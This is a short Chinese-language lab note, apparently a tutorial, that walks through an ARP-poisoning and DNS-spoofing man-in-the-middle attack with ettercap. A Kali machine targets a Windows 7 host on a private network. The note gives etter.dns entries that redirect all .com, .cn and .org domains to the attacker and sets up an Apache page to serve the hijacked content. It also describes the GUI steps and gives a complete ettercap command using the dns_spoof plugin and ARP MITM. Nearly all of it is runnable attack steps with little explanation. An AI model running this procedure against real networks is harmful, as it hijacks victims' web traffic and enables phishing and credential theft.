攻击者 kali ip:192.168.5.128
受迫者 win7 ip:192.168.5.129
首先配置ettercap
leafpad /etc/ettercap/etter.dns
* A 192.168.5.128
*.com A 192.168.5.128
*.cn A 192.168.5.128
*.org A 192.168.5.128
设置劫持后网页模样
leafpad /var/www/index.html
service apache2 start
(启动apache2 服务器)
1、ettercap -G
(开启ettercap )
选择dns_spoof插件
sniff eth0选项,打开host list 搜索host ,添加网关和相应的机器
机器加入到攻击者1 网管加入到攻击者2 然后选择中间人攻击arp
勾选sniff remote connections已达到监听的目的。
start sniff 开始攻击
2、ettercap -T -q -i eth0 -P dns_spoof -M arp /192.168.5.2/ /192.168.5.129/